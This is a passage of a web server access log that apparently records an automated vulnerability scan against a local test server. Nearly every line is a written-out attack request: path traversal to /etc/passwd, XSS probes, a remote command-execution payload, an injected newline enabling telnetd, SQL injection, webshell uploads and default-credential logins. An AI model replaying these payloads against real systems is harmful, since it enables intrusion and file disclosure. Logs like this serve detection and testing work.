"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CF_SFSD/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F127.0.0.1%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22id\x22: \x22nuclei\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22condition\x22: {\x0D\x0A \x22parameterValues\x22: {\x0D\x0A \x22nuclei\x22: \x22script::Runtime.getRuntime().exec('id')\x22\x0D\x0A },\x0D\x0A \x22type\x22: \x22profilePropertyCondition\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22sessionId\x22: \x22nuclei\x22\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /context.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"297MU1JwyVuyUtZ0XNvya7U9aQr.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?q=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/calendar/agenda_list.php?type=xss\x22+onmouseover=alert(document.domain)+\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn nuclei1:__typename \x5Cn nuclei2:__typename \x5Cn nuclei3:__typename \x5Cn nuclei4:__typename \x5Cn nuclei5:__typename \x5Cn nuclei6:__typename \x5Cn }\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"dir=%2Fetc%2F&onlyFiles=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /s/sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__clockwork/app HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/database.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MyErrors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-----------------------------20873900192357278038549710136\x0D\x0AContent-Disposition: form-data; name=\x22file1\x22; filename=\x22poc.aspx\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A297MTybtnCJ3Vjt2qxvCSX6k2L7\x0D\x0A-----------------------------20873900192357278038549710136--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"password=12345","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hui/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/application.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/default.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"recipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /NateMail.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"j_username=admin&j_password=password","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pentaho/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dc2/admin/auth.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translations/en.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A\x0D\x0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/health-check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"email=springbird@qq.com&password=springbird&remeber=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22297MTplDIIu3YwqAtfZpahZCjQA.php\x22\x0D\x0A\x0D\x0A297MTkQQzM2RS9Wex3286El6rBY\x0D\x0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22name\x22\x0D\x0A\x0D\x0A297MTplDIIu3YwqAtfZpahZCjQA.php\x5Cx0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) 